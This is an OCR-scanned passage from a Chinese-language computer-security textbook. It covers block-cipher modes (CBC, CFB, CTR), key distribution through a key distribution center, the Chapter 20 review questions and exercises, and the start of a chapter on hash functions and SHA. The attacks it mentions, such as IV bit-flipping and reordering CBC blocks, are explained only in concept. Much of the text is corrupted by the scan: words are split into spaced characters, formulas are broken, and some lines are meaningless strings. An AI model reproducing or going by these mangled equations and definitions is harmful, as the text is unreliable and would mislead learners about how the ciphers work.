的 周期 正好 是 b 位 的 倍数 ,分 析 者 就 能 辨认 出 这 些 成 分 ， 然后 可 以 用 代 换 和 重 排 这 些 分 组 的 方 
法 进行 攻击 。 

为 了 克服 ECB 这 些 弱 点 ， 我 们 需要 一 种 技术 将 重复 的 明文 组 加 密 成 不 同 的 密 文 组 。 


20.5.2 ”密码 分 组 链接 模式 


在 密码 分 组 链接 (CBC) 模式 下 ( 见 图 20-7 )， 加 密 算 法 的 输入 是 当前 明文 组 和 上 一 个 密 文 
组 的 异 或 (XOR)， 而 使 用 的 密 钥 相 同 。 这 就 相当 于 将 所 有 的 明文 组 链接 起 来 了 。 加 密 算 法 的 ”[623 
每 次 输入 与 本 明文 组 没有 固定 的 关系 。 因 此 ， 夺 有 重复 的 b 位 明文 组 ， 加 密 后 就 看 不 出 来 了 。 


时 | 间 =1 时 间 = 





b) 解密 
图 20-7 ”密码 分 组 链接 (CBC) 模式 


解密 时 ， 每 个 密码 分 组 通过 解密 算法 分 别 进行 解密 ， 再 与 上 一 块 密 文 异 或 可 恢复 出 明文 。 
下 面 对 这 个 过 程 的 正确 性 给 出 证 明 : 
C=E(K, [Gi © PJ) 
XE E[K, X] 表示 利用 密 钥 K 对 明文 的 加 密 ， 饼 表示 异 或 操作 ， 则 
D(K, G)=D(K, E(K, [G-i ® P])) 
D(K, G)=G- 由 P; 
Gja 中 D(K, C)=G. 由 Ci ® P;=P; 
以 上 验证 了 图 20-7b。 
为 了 产生 第 一 个 密 文 块 ， 一 个 初始 矢量 CIV) 和 第 一 个 明文 块 异 或 。 解 密 时 ， 将 第 一 块 密 
文 解密 的 结果 与 IV 异 或 而 恢复 出 第 一 块 明文 。 
IV 必须 收 发 双方 共享 。 为 了 增加 安全 性 ， 和 密 钥 一 样 应 该 对 I 斑 加 以 保护 。 比 如 用 ECB 
加 密 来 保护 IV. 要 保护 不 的 一 个 原因 是 ， 攻 击 者 可 以 欺骗 接收 者 ， 让 他 使 用 不 同 的 I， 然后 
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将 第 一 个 明文 组 的 某 些 位 取 反 。 为 了 解 这 一 点 ， 考 虑 如 下 的 要 求 : 
C=E(K, UV DP]) 
'=IV © D(K, CI 
现在 用 X[ 有 站 表示 b 位 的 X 的 第 j WA: 
P,[i]J=IV [i] © D(K, C)[i] 
使 用 XOR 的 性 质 ， 我 们 可 以 写 为 : 
| P,{i]'=JV [i] © Dk, CN) 
fils AN UR. OR aT WEE IV pee, MBE E Py 相应 也 就 改 
eT a 


20.5.3 ”密码 反馈 模式 


利用 密码 反馈 模式 (CFB) 可 以 将 任意 分 组 密码 转换 成 流 密码 。 流 密码 不 需要 明文 长 度 是 
分 组 长 度 的 整数 倍 ， 且 可 以 实时 操作 。 所 以 ， 竺 发送 的 字符 流 中 任何 一 个 字符 都 可 以 用 面向 字 
符 的 流 密 码 加 密 后 立即 发 送 。 

流 密码 一 个 让 人 心动 的 性 质 是 ， 密 文 与 明文 等 长 。 所 以 ， 如 果 要 发 送 8 位 的 字符 ， 加 密 时 
也 是 用 8 位 。 如 果 多 于 8 位 ， 传 输 能 力 就 浪费 了 。 

图 20-8 HHE T CFB 模式， 图 中 ,假设 传输 单元 是 s 位，s 通常 为 8。 如 果 用 CBC 模式 ， 
明文 的 各 个 单元 要 链接 起 来 ， 所 以 任意 一 个 明文 单元 的 密 文 都 是 前 面 所 有 明文 的 函数 。 
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b) 解密 
图 20-8 s 位 密码 反馈 (CFB) 模式 
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首先 来 考虑 加 密 。 加 密 的 输入 是 位 的 移 位 寄存 器 ， 它 的 值 为 初始 矢量 IV. WMA eA Boe 
左边 (最 高 有 效 ) 的 s 位 与 明文 已 异 或 得 到 第 一 个 密 文 单元 Cl。 然 后 将 O 发 送出 去 。 接 着 ， 
移 位 寄存 器 左 移 s 位 ，C' 填 人 移 位 寄存 器 的 最 右边 (最低 有 效 ) s 位 。 就 这 样 ， 直 到 所 有 明文 
单元 加 密 完 成 。 
解密 使 用 相同 的 方法 ,不 同 之 处 是 将 收 到 的 密 文 单元 与 加 密 涵 数 的 输出 异 或 得 到 明文 单 
元 。 注 意 ， 这 里 使 用 的 是 加 密 盟 数 而 非 解密 函数 ， 这 一 点 很 容易 理解 。 设 SC ) 表示 站 的 最 左 
边 (最 高 有 效 )s 位 ， 则 有 
CI 一 局 © S,(E(K, IV )) 
从 而 有 
万 一 Cl ® S,[E(K, IV )] 
对 后 续 单 元 亦 同 理 可 得 。 


20.5.4 计数 器 模式 


尽管 由 于 计数 器 模式 (CTR) 在 ATM (异步 传输 模式 ) 网 络 安 全 与 IPSec (PRE) 中 
的 应 用 ， 人 们 最 近 才 对 它 产 生 了 浓厚 的 兴趣 ， 但 实际 上 ， 这 种 模式 很 早 就 已 经 提出 来 了 ， 如 
[DIFF79] 。 

图 20-9 描述 了 CTR 模式 。 计 数 需 使 用 与 明文 分 组 规模 相同 的 长 度 。SP 800-38A 的 唯一 要 
求 是 加 密 不 同 的 明文 组 计数 器 对 应 的 值 必须 是 不 同 的 。 典 型 地 ， 计 数 器 首先 被 初始 化 为 某 一 
值 ， 然 后 随 着 消息 块 ( 模 2 ， 其 中 4。 为 分 组 大 小 ) 的 增加 计数 器 的 值 加 1。 计 数 器 加 1 后 与 明 
文 组 异 或 得 到 密 文 组 。 解 密使 用 具有 相同 值 的 计数 器 序列 ， 用 加 密 后 的 计数 天 的 值 与 密 文 组 异 
或 来 恢复 相应 的 明文 组 。 

计数 器 计数 器 +1 计数 器 +N-1 





i 
b) 解密 
图 20-9 计数 器 (CTR) 模式 


文献 [LIPM00] Fh TI RERI (CTR) 的 如 下 优点 : 

o 硬件 效率 (hardware efficiency): 与 三 种 链接 模式 不 同 ，CTR 模式 能 够 并 行 处 理 多 块 明 
X (EX) 的 加 密 (解密 )。 链 接 模式 在 处 理 下 一 块 数 据 前 必须 完成 当前 数据 块 的 计算 ， 
这 就 限制 了 算法 的 吞吐 量 。 在 CTR 模式 中 ,吞吐 量 仅 受 可 使 用 并 行 数量 的 限制 。 
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o 软件 效率 (software efficiency): 类 似 地 ， 因 为 CTR 模式 能 够 进行 并 行 计 算 ， 所 以 处 
理 器 能 够 很 好 地 用 来 提供 像 流水 线 、 每 个 时 钟 周期 的 多 指令 分 派 、 大 数量 的 寄存 器 和 
SIMD 指令 等 并 行 特征 。 

e 预 处 理 (preprocessing): 基本 加 密 算法 的 执行 并 不 依靠 明文 或 密 文 的 输入 。 因 此 ， 如 

果 有 充足 的 存储 器 可 用 且 能 够 提供 安全 ， 预 处 理 器 能 够 准备 如 图 20-9 所 示 的 用 于 XOR 

的 函数 的 加 密 盒 的 输出 。 当 给 出 明文 或 密 文 时 ， 所 需 的 计算 仅 是 进行 一 系列 的 异 或 。 

这 样 的 策略 能 够 极 大 地 提高 吞吐 量 。 

随机 访问 (random access): 密 钥 的 第 ;个 明文 组 能 够 用 一 种 随机 访问 的 方式 处 理 。 在 

链接 模式 下 ， 前 面 的 i-1 块 密 文 计 算出 来 后 才能 计算 密 文 C。 有 很 多 应 用 情况 是 全 部 

密 文 已 存储 好 了 ， 只 需要 破解 其 中 某 一 块 密 文 。 对 于 这 种 情形 ， 随 机 访问 的 方式 很 有 


‘ 
2 


吸引 力 。 
e 可 证 明 安 全 性 (provable security): 能 够 证 明 CTR 模式 至 少 和 本 节 讨 论 的 其 他 模式 一 样 
安全 。 


。 简单 性 (simplicity) : 与 ECB 和 CBC 不 同 ，CTR 模式 要 求实 现 加 密 算法 ， 但 不 要 求实 
现 解 密 算法 。 像 高 级 加 密 标准 (AES) 一 样 ， 当 加 密 算法 与 解密 算法 本 质 上 不 同时 ， 就 
更 能 体现 这 种 模式 的 简单 性 。 男 外 ， 也 不 用 实现 解密 密 钥 扩 展 。 


20.6 ATK 


对 称 加 密 要 求 交 换 消 息 双 方 共享 密 钥 ， 并 且 此 密 钥 不 为 他 人 所 知 。 此 外 ， 密 钥 要 经 常 变 
动 ， 以 防 攻击 者 知道 。 因 此 ， 任 何 密码 系统 的 强度 都 与 密 钥 分 发 方法 有 关 。 密 钥 分 发 方法 是 指 
将 密码 分 发 给 希望 交换 数据 的 双方 而 不 让 别人 知道 的 方法 。 对 于 参与 者 A 和 B， 密 钥 的 分 发 
有 以 下 几 种 方法 : 

1. 密 钥 由 A 选择 ， 并 亲自 交 给 B。 

2. 第 三 方 选择 密 钥 后 亲自 交 给 A 和 B。 

3. 如 果 A 和 B 以 前 或 最 近 使 用 过 某 密 钥 ， 其 他 一 方 可 以 用 它 加 密 一 个 密 钥 后 再 发 送 给 男 一 方 。 

4. A 和 B 与 第 三 方 C 均 有 秘密 渠道 ， 则 C 可 以 将 一 密 钥 分 别 秘密 发 送 给 A AB. 

方法 1 和 2 需要 人 工 传送 密 钥 。 对 链 路 加 密 ， 这 个 要 求 并 不 过 分 。 因 为 每 个 链 路 加 密 设 
备 仅 同 链 路 另 一 方 进行 数据 交换 。 但 是 对 于 端 对 端 加 密 ， 这 样 做 未 免 有 些 笨拙 。 在 分 布 式 系统 
中 ， 任 何 主机 和 终端 可 能 需要 和 其 他 许多 主机 或 终端 经 常 交 换 数据 。 所 以 ， 每 个 设备 需要 大 量 
动态 产生 的 密 钥 ， 特 别 是 对 于 那些 广 域 分 布 系统 。 

方法 3 可 以 用 于 链 路 加 密 ， 也 可 用 于 端 对 端的 加 密 。 但 是 ， 如 果 攻 击 者 曾经 成 功 获取 过 一 
个 密 钥 ， 则 所 有 子 密 钥 都 暴露 了 。 就 算 频 繁 更 改 链 路 层 加 密 密 钥 ， 这 些 更 改 也 应 该 手工 完成 。 
为 端 到 端 加 密 提 供 密 钥 ， 方 法 4 更 可 取 。 

图 20-10 阐明 了 满足 方法 4 的 端 到 端 加 密实 现 方法 。 图 中 ， 链 路 层 加 密 被 忽略 了 ， 可 以 根 
据 需 要 添加 或 不 添加 它 。 在 这 个 方案 中 ， 定义 了 两 种 密 钥 : 

e 会 话 密 钥 : 当 两 个 端 系 统 ( 主 机 、 终 端 等 ) 希望 通信 时 ， 他 们 建立 一 条 逻辑 连接 〈 例 如 ， 

虚 电路 )。 在 逻辑 连接 持续 过 程 中 ， 所 有 用 户 数据 都 使 用 一 个 一 次 性 的 会 话 密 钥 加 密 。 
在 会 话 或 连接 结束 时 ， 会 话 密 钥 被 销毁 。 

e 永久 密 钥 : 永久 密 钥 是 在 实体 之 间 用 于 分 发 会 话 密 钥 的 。 

配置 包含 如 下 元 素 : 

e 密 钥 分 发 中 心 : 密 钥 分 发 中 心 (KDC) 判断 哪些 系统 允许 相互 通信 。 当 两 个 系统 被 允 

许 建立 连接 时 ， 密 钥 分 发 中 心 就 为 这 条 连接 提供 一 个 一 次 性 会 话 密 钥 。 
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© 安全 服务 模块 : 这 个 模块 可 能 包含 一 个 协议 层 上 的 功能 ， 执 行 端 到 端 加 密 ， 为 用 户 获 


取 会 话 密 钥 。 






1. 主 机 发 送 请 求 连接 的 数据 包 

2. 安 全 服务 将 包 缓存 并 向 KDC 请 求 会 话 密 钥 
3. KDC 给 两 个 主机 发 送 会 话 密 钥 

4. 发 送 缓存 的 数据 包 


图 20-10 ”面向 连接 协议 的 目 动 密 钥 分 发 


图 20-10 中 显示 了 建立 连接 包含 的 步骤 。 当 一 个 主机 期 望 与 另 一 个 主机 建立 连接 时 ， 它 
传送 一 个 连接 请 求 包 (步骤 1)。SSM 保存 这 个 包 ， 向 KDC 申请 建立 连接 的 许可 (步骤 2 )。 
SSM 和 KDC 之 间 的 通信 使 用 一 个 只 由 此 SSM 和 KDC 共享 的 主 密 钥 加 密 。 如 果 KDC 批准 此 
连接 请 求 ， 它 产生 一 个 会 话 密 钥 并 将 其 传递 给 这 两 个 SSM， 向 每 个 SSM 传递 时 分 别 使 用 唯一 
的 永久 密 钥 (步骤 3 )。 发 出 请 求 的 SSM 现在 可 以 释放 连接 请 求 包 ， 并 且 在 这 两 个 端 系统 之 间 
建立 连接 (步骤 4 )。 这 两 个 端 系统 之 间 交 换 的 所 有 数据 都 通过 它们 各 自 的 SSM 使 用 一 次 性 会 


话 密 钥 加 密 。 


这 个 目 动 密 钥 分 发 方法 提供 了 人 允许 大 量 终端 用 户 访问 大 量 主 机 以 及 主机 间 交 换 数 据 所 需要 


的 灵活 性 和 动态 特性 。 


万 外 一 种 密 钥 分 发 使 用 公 钥 加 密 ， 将 在 第 21 章 中 讨论 。 


20.7 关键 术语 、 复 习题 和 习题 


关键 术语 

Advanced Encryption Standard (AES， 高 级 加 密 
标准 ) 

block cipher (分 组 密码 ) 

brute-force attack (#2 JJ UG ) 

computationally secure (计算 安全 性 ) 

Cipher Block Chaining (CBC) mode (密码 分 组 链 
接 模 式 ) 

Cipher FeedBack (CFB) mode (密码 反馈 模式 ) 

ciphertext (X) 

counter mode (计数 需 模 式 ) 

cryptanalysis (密码 分 析 学 ) 


Data Encryption Standard (DES， 数 据 加 密 标准 ) 
decryption (解密 ) 

Electronic CodeBook (ECB) mode (电子 密码 本 模式 ) 
encryption (加密 ) 

end-to-end encryption (mE! mh JN A ) 

Feistel cipher (Feistel 密码 ) 

key distribution ( 密 钥 分 发 ) 

keystream ( 密 钥 流 ) 

link encryption 〈 链 路 加 密 ) 

modes of operation (操作 模式 ) 

plaintext (明文 ) 
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session key (会 话 密 雏 ) symmetric encryption (对 称 加 密 ) 
stream cipher ( 流 密码 ) triple DES (3DES， 三 重 DES) 
subkey ( 子 密 钥 ) 


复习 题 


20.1 对称 密码 的 主要 组 成 部 分 是 什么 ? 

20.2， 蜜 码 算法 的 两 个 基本 函数 是 什么 ? 

20.3 ”用 密码 进行 通信 的 两 个 人 需要 多 少 密 钥 ? 

20.4 分 组 密码 与 流 密码 的 区 别 是 什么 ? 

20.5 攻击 密码 的 两 种 一 般 方法 是 什么 ? 

20.6 “为 什么 某 些 分 组 密码 的 操作 模式 仅 使 用 加 密 算法 ， 而 其 他 的 模式 既 使 用 加 密 算法 又 使 用 解密 算法 ? 
20.7 什么 是 三 重 加 密 ? 

20.8 ”为 什么 3DES 的 中 间 部 分 采用 了 解密 而 不 是 加 密 ? 
20.9 ” 链 加 密 和 端 对 端 加 密 的 区 别 是 什么 ? 

20.10 请 列 出 密 钥 分 配 到 通信 双方 的 几 种 方法 。 

20.11 会 话 密 钥 和 主 密 钥 的 区 别 是 什么 ? 

20.12 ”什么 是 密 钥 分 发 中 心 ? 


习题 


20.1 说 明 Feistel 解密 是 Feistel 加 密 的 逆 过 程 。 

20.2 ”考虑 一 个 由 16 轮 的 128 位 长 的 分 组 和 128 位 长 的 密 钥 组 成 的 Feistel 密码 。 假 设 对 于 一 个 给 定 的 大 ， 
密 钥 产生 算法 决定 了 前 8 轮 的 密 钥 值 后, ko, ks, SAIS 

ko=ks, kio= kz, ki = ke, "kie ™ ki 
假设 你 有 一 个 密 文 <， 解释 怎样 通过 获得 一 个 加 密 oracle (encryption oracle) 以 及 只 使 用 一 个 

单独 的 oracle 询问 来 解密 c 并 确定 m。 这 表明 了 该 密码 是 容易 受到 选择 明文 攻击 的 。( encryption 
oracle 可 以 被 认为 是 一 个 设备 ， 该 设备 对 于 一 个 给 定 的 明文 .能 生成 相应 的 密 文 。 你 不 知道 该 设备 
的 内 部 细节 并 且 不 能 打开 该 设备 。 你 只 能 通过 询问 该 设备 并 获得 它 的 应 答 来 获取 信息 。) 

20.3 ”对 于 任意 分 组 密码 ， 事 实 上 ， 它 是 一 个 非 线性 函数 对 于 其 安全 性 是 至 关 重 要 的 。 看 这 个 例子 ， 假 
设 我 们 有 一 个 线性 分 组 密码 EL， 它 加 密 一 个 128 位 的 明文 产生 128 位 的 密 文 。EL(k, m) 表示 利用 
一 个 密 钥 (的 实际 长 度 是 无 关 紧 要 的 ) 来 加 密 一 个 128 位 的 消息 m 所 得 到 的 密 文 ， 因 此 ， 对 所 
有 128 位 模式 的 m, mo: 

EL (k,[m, ® m2])=EL(k, m) Ð EL(k, mz) 
解释 敌手 怎样 利用 128 TEREX, TER A A k AIO F Die aE HO. (e 

“选择 密 文 ”是 指 敌 手 可 以 通过 选择 一 个 密 文 来 获得 它 的 解密 。 这 里 ， 有 128 个 明 / 密 文 对 ， 并 且 
可 以 选择 密 文 的 值 -) 

20.4 怎样 的 RC4 密 钥 会 使 S 在 初始 化 时 不 被 改变 ? 即 在 S 的 初始 化 排列 之 后 ，S 中 的 各 元 素 的 值 等 于 
0 一 255 的 升序 排列 值 。 

20.5 RC4 有 一 个 秘密 的 内 部 状态 ， 它 是 向 量 S 以 及 两 个 下 标 i 和 j 的 所 有 可 能 值 的 排列 。 
a. 使 用 一 个 简单 的 方案 来 存储 此 内 部 状态 ， 要 使 用 多 少 位 ? 
b. 假设 我 们 从 这 个 状态 能 代表 多 少 信息 量 的 观点 来 思考 它 。 这 样 我 们 需要 判断 有 多 少 种 不 同 的 状态 ， 然 

后 取 以 2 为 底 的 对 数 来 得 到 它 代 表 了 多 少 位 的 信息 量 。 使 用 此 方法 ,需要 多 少 位 来 代表 这 个 状态 ? 

20.6 利用 ECB 模式， 如 果 传 输 密 文 的 一 个 分 组 出 错 ， 只 有 对 应 的 明文 分 组 受 影响 。 但 是 利用 CBC 模 
式 ， 会 传播 错误 。 例 如 ， 传 输 的 Ci ( 见 图 20-7) 中 的 错误 显然 会 破坏 Pi Al Pr. 
a. BR Pa 之 外 还 有 其 他 分 组 受 影响 吗 ? 
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b. 假设 Pi 的 源 版 本 中 有 1 位 的 错误 。 此 错误 会 传播 多 少 密 文 分 组 ?接收 端 所 受 的 影响 是 什么 ? 
20.7 假设 在 利用 CBC 传输 一 个 密 文 分 组 时 发 生 了 一 个 错误 ， 将 会 对 相应 的 明文 分 组 产生 怎样 的 
影响 ? 
20.8 假设 你 想 做 一 个 用 CBC 模式 进行 分 组 加 密 的 硬件 设备 ， 要 求 算法 强度 比 DES 强 。3DES 是 一 个 很 
好 的 候选 算法 。 图 20-11 给 出 了 两 种 方案 ,使 用 的 都 是 CBC 模式 。 你 将 选择 哪 一 个 ? 
a. 从 安全 性 角度 考虑 。 
b. 从 性 能 上 考虑 。 
20.9 假设 使 用 3DES 芯片 和 一 些 异 或 函数 ， 你 能 对 图 20-11 中 给 出 的 两 种 方案 进行 安全 性 修改 吗 ? 假设 


仍旧 使 用 两 个 密 钥 。 





a) 单 轮 CBC b) 三 轮 CBC 
图 20-11 将 3DES FA CBC 模式 


20.10 HR F RRR E: 


电子 密码 本 (ECB) 模式 CG=E(K,P)) j=1,…,N P=D(K,G) j=1,.%,N 
C=E(K[P 图 7 四) P\=D(K, Ci) @ IV 
ARMEES (CBO Af CG BE 四 Ci]) 人 Ts | RP=DKC)@Ga fHBeN 
密码 反馈 (CFB) 模式 
计数 器 (CTR) 模式 
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20.11 CBC-Pad 是 RCS 分 组 密码 使 用 的 分 组 密码 操作 模式 ， 但 它 能 在 任何 分 组 密码 中 使 用 。CBC-Pad 


处 理 任 意 长 度 的 明文 ， 密 文 最 多 比 明文 长 一 个 分 组 ， 填 充 字 节 用 来 保证 明文 输入 是 分 组 长 度 的 倍 
数 。 假 设 原始 明文 是 整数 个 字 节 。 明 文 在 未 尾 添 加 的 字 节 数 可 以 是 1 到 bbp， 其 中 bb EPS 
表示 的 分 组 大 小 。 填 充 的 字 节 都 相等 并 设 为 一 个 代表 填充 字 市 数 的 字 广 。 例 如 ， 如 采 添 加 了 8 个 
字 节 ， 那 么 填充 的 每 个 字 节 的 比特 表示 则 为 00001000。 为 什么 不 允许 填充 0 字 节 ? 即 如 果 原 始 
明文 是 分 组 大 小 的 整数 倍 ， 为 什么 不 会 避免 进行 填充 ? 

填充 并 不 总 是 合适 的 。 例 如 ， 也 许 希 望 在 存储 明文 的 同一 内 存 缓冲 区 存储 加 密 的 数据 。 在 这 种 情 
况 下 ， 密 文 必须 与 原始 明文 等 长 。 用 于 此 目的 的 一 个 模式 是 密 文 鳃 取 ( CipherText Stealing, CTS) 
模式 。 图 20-12a 表示 这 个 模式 的 实现 。 

a. 解释 它 是 怎样 工作 的 。 

b. 描述 怎样 解密 Cr- 和 Cro 


20:12 








a) 密 文 窃取 模式 
P, Pia Fua Pi 
Iv (bbfy) ( bb{iz ) ( bbfiz ) (7 位 ) 
Cy- (++) H Q 
++ «fing | «Line | fine EF 
C, Caa Gs, Giy 
( bb 位 ) ( bb 位 ) ( bb 位 ) (7 位 ) 
b) 替代 方法 


图 20-12 用 于 非 分 组 大 小 倍数 的 明文 的 分 组 密码 操作 模式 
20.13 图 20-12b 显示 了 当 明 文 不 是 分 组 大 小 的 整数 倍 时 产生 和 明文 等 长 的 密 文 的 CTS 的 替代 方法 。 
a. 解释 此 方法 。 
b. 解释 为 什么 CTS 优 于 图 20-2b 的 方法 。 
20.14 ”如 果 在 以 8 位 CFB 模式 传输 密 文 字符 时 发 生 了 1 位 的 错误 ， 错 误会 传播 多 远 ? 
20.15 一 种 使 用 最 广泛 的 消息 认证 码 (MAC) 是 数据 认证 算法 (Data Authentication Algorithm)， 它 是 基 
F DES 的 ， 同 时 该 算法 既是 FIPS 发 布 版 本 (FIPS PUB 113) 又 是 ANSI 标准 ( X9.17 )。 该 算法 
可 以 被 定义 为 一 个 初始 向 量 为 0 的 密码 分 组 链接 模式 (CBC) 的 DES 操作 ( 见 图 20-7 )， 需 要 被 
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认证 的 数据 (如 消息 、 记 录 、 文 件 或 程序 ) 被 分 成 连续 的 64 位 的 分 组 : Pi, P,…, Pro 如 果 有 必 
要 ， 在 最 后 一 个 分 组 的 右边 用 0 填充 形成 一 个 满 64 位 的 分 组 。 消 息 认证 码 (MAC) 或 者 由 整个 
密 文 分 组 Cv 或 者 分 组 的 左边 M 位 组 成 (16 入 M<64 )。 请 说 明 使 用 密码 反馈 模式 能 够 产生 相同 
的 结果 。 

20.16 ” 密 钥 分 发 方案 使 用 了 一 个 访问 控制 中 心 (access control center) 或 一 个 密 钥 分 发 中 心 ( key distributing 
center)， 中 心 结 点 易 受 攻击 。 讨 论 这 种 集中 化 的 安全 隐患 。 

20.17 假设 菜 人 建议 了 如 下 的 方法 来 确认 你 们 两 个 人 拥有 同一 密 钥 : 你 建立 一 个 长 为 密 钥 长 度 的 随机 位 
串 ， 将 它 和 密 钥 异 或 并 将 结果 发 回 到 通道 上 。 你 的 同伴 异 或 其 接收 的 分 组 和 密 钥 (应 该 与 你 的 密 。 [631 
钥 相 同 ) 并 发 回 。 你 进行 核对 ， 如 果 你 接收 到 的 是 你 的 原始 随机 串 ， 那 么 就 证 实 了 你 的 伙伴 拥有 ”|643 
同一 密 钥 ， 而 你 们 两 个 人 还 没有 传递 过 密 钥 。 这 个 方案 有 什么 缺陷 吗 ? 
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学 习 目标 
学 习 完 本 章 之 后 ， 你 应 该 能 够 : 
o 理解 SHA-1 和 SHA-2 的 操作 ; 


o 概述 HMAC 在 消息 认证 中 的 应 用 ; 
e 描述 RSA 算法 ; 
e 描述 Diffie-Hellman 算法 。 





本 章 介 绍 2.2 节 到 2.4 节 所 述 内 容 的 技术 细节 。 


21.1 安全 散 列 函数 


单身 散 列 郴 数 或 安全 散 列 因数 不 仅 在 消息 认证 中 很 重要 ， 在 数字 签名 中 也 很 重要 。2.2 节 
中 讨论 了 安全 散 列 函数 的 要 求 和 安全 性 。 这 里 ， 我 们 讨论 几 种 散 列 函数 ， 并 研究 使 用 最 广泛 的 
一 种 散 列 函数 : SHA. 


21.1.1 简单 散 列 函数 


所 有 的 散 列 函数 通常 都 遵循 以 下 的 原则 。 输 入 (消息 、 文 件 等 ) 都 可 看 作 一 个 n 位 分 组 的 
序列 。 散 列 函 数 每 次 处 理 一 个 输入 分 组 ， 反 复 地 产生 一 个 n 位 的 散 列 值 。 

最 简单 的 散 列 函数 之 一 是 将 每 个 分 组 逐 位 异 或 (XOR)， 这 个 函数 可 描述 如 下 : 

C=); © bz O- ® bim 

其 中 : 

C= BOVIS i ii, 1Si<n 

m= AP 位 分 组 的 个 数 

by 二 第 j 个 分 组 的 第 i 位 

名 = 二 异 或 运算 

21-1 说 明了 这 个 运算 过 程 ， 它 对 每 一 位 产生 一 个 简单 的 奇偶 校 验 ， 称 之 为 纵向 元 余 校 
验 。 这 种 方法 对 于 随机 数据 的 数据 完整 性 检查 非常 有 效 。 如 果 每 个 位 的 散 列 值 出 现 的 概率 都 
相同 ， 那么 数据 出 错 而 不 引起 散 列 值 改 变 的 概率 为 2”。 帮 数据 格式 不 是 随机 的 ， 则 会 降低 也 
数 的 有 效 性 。 例 如 ， 通 滑 大 多 数 文 本 文件 中 每 个 8 位 字 闻 的 高 位 总 为 0， 在 使 用 128 位 的 散 列 
值 ， 则 对 这 类 数据 ， 散 列 值 函 数 的 有 效 性 是 2 而 不 是 2 …”。 

一 种 简单 的 提高 性 能 的 方法 是 在 每 个 
分 组 处 理 完成 后 对 散 列 值 进行 1 RE yg 
动 或 旋转 。 这 个 过 程 可 归纳 如 下 : 分 组 2 

1. n 位 散 列 值 的 初 值 为 0。 

2. 如 下 处 理 每 个 连续 n 位 分 组 : 

a. 将 当前 的 散 列 值 循环 左 移 一 位 。 散 列 码 
b. 将 该 分 组 与 散 列 值 异 或 。 





图 21-1 按 位 异 或 的 简单 散 列 晒 数 
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这 样 ， 可 使 输入 更 加 完全 地 “随机 ”， 从 而 消除 输入 数据 的 规则 性 。 

虽然 这 种 改进 的 方法 可 以 很 好 地 保证 数据 的 完整 性 ， 但 是 如 果 使 用 图 2-5a 和 b 所 示 的 方 
法 ， 即 加 密 后 的 散 列 码 附 在 明文 之 后 ， 那 么 该 方法 不 能 保证 数据 的 安全 性 。 因 为 很 容易 产生 一 
条 新 消息 ， 使 它 与 给 定 的 消息 具有 相同 的 散 列 码 ， 先 选 定 某 消息 ， 然 后 在 其 后 附加 一 个 n 位 分 
组 ,使 它们 与 给 定 的 消息 具有 相同 的 散 列 码 。 

如 果 只 对 散 列 码 加 密 ， 那 么 上 述 简单 异 或 、 循 环 异 或 (RXOR) 方法 不 能 保证 数据 的 安全 
性 ， 但 是 如 果 对 消息 和 散 列 码 均 加 密 ， 你 可 能 认为 这 个 简单 的 阻 数 是 有 效 的 ， 但 这 些 方法 可 能 
仍然 存在 问题 。 国 家 标准 局 最 初 提出 了 一 种 方法 ， 这 种 方法 对 64 位 的 分 组 执行 简单 异 或 操作 ， 
然后 使 用 密 文 块 链接 (CBC) RAIRA. MERS X, X, 0, X, HP X E 64 
位 的 分 组 ， 其 散 列 码 C 为 所 有 分 组 的 异 或 ， 并 且 将 该 散 列 码 作为 最 后 一 个 分 组 。 

C=Xyn =X] DX @O:® Xy 
然后 ， 使 用 CBC 模式 对 消息 和 散 列 码 加 密 得 到 Y, Ya, ot, Yvo 文献 [JUEN85] 中 给 出 
了 几 种 改变 消息 密 文 而 散 列 码 无 法 检测 的 攻击 。 例 如 ， 根 据 CBC 的 定义 ( 见 图 20-7 )， 我 
们 有 
X,=IV ®© D(K, Y;) 
X= Yi © DK, Y) 
Xvi = Yy © D(K, Yy+1) 
月 散 列 码 Xv A 
Xv =X, OX. O-O Xv 
=[IV © D(K, Yi) © [Y © D(K, ¥2)] OD [Yr © D(K, Yw)] 

由 于 上 述 等 式 中 异 或 可 以 按 任意 顺序 计算 ， 所 以 改变 密 文 分 组 的 顺序 ， 散 列 码 仍然 不 变 。 


21.1.2 SHA 安全 散 列 函数 


近年 来 ， 使 用 最 为 广泛 的 散 列 函数 是 SHA。 事实 上， 由 于 其 他 广泛 使 用 的 散 列 函数 被 发 
现 有 大 量 密码 分 析 弱 点 ，SHA 或 多 或 少 是 到 2005 年 时 最 后 留 下 的 散 列 算法 标准 。 安 全 散 列 算 
法 (SHA) 由 美国 标准 与 技术 研究 所 (NIST) 设计 于 1993 年 并 作为 联邦 信息 处 理 标 准 (FIPS 
180) 发 布 ， 修 订 版 于 1995 年 发 布 (FIPS 180-1 )， 通 常 称 之 为 SHA-1。RFC 3174 也 给 出 了 
SHA-1， 它 基本 上 复制 了 FIPS 180-1 中 的 内 容 ， 但 增加 了 C 代码 的 实现 。 

SHA-1 产生 160 位 的 散 列 值 。2002 年 ，NIST 制定 了 新 版 本 标准 : FIPS 180-2。 它 定义 了 
三 种 新 版 本 的 SHA， 散 列 值 的 长 度 分 别 为 256、384、512 位 ， 分 别称 为 SHA-256、SHA-384、 
SHA-512 ( 见 表 21-1 )。 总 体 来 说 ,这些 散 列 算法 被 称 为 SHA-2。 新 版 本 使 用 了 与 SHA-1 相同 
的 底层 结构 和 相同 类 型 的 模 运 算 以 及 相同 的 二 元 逻辑 运算 。2008 年 一 个 改进 的 文件 作为 FIPS 
180-3 发 布 ， 其 中 加 入 了 一 个 224 位 的 SHA-256 版 本 ， 其 散 列 值 通过 截断 SHA-256 的 256 位 
散 列 值 而 获得 。SHA-1 和 SHA-2 也 在 RFC 6234 [美国 安全 散 列 算法 (SHA 和 基于 SHA 的 
HMAC 和 HKDF)，2011 年 ] 中 给 出 ， 其 本 质 上 复制 了 FIPS 180-4 的 内 容 ， 但 在 其 中 加 入 了 C 
代码 实现 。 最 新 的 版 本 是 FIPS 180-4 (安全 散 列 标准 (SHS), 20154F 8 月 )， 其 包括 两 个 散 列 
规格 为 224 位 和 256 位 的 SHA-512 的 变形 。 在 许多 64 位 的 系统 中 ，SHA-512 要 比 SHA-256 
更 高 效 。 

2005 年 NIST 宣布 ， 计 划 到 2010 年 不 再 认可 SHA-1， 转 为 信任 其 他 SHA 版 本 。 此 后 不 
久 ， 有 个 研究 团队 描述 了 一 种 攻击 方法 ,该 方法 只 用 2” 次 操作 就 可 以 找到 产生 相同 的 SHA-1 
的 两 条 独立 的 消息 ， 远 少 于 以 前 认为 找到 SHA-1 碰撞 所 需 的 2° 次 操作 [WANG05]。 这 个 结果 
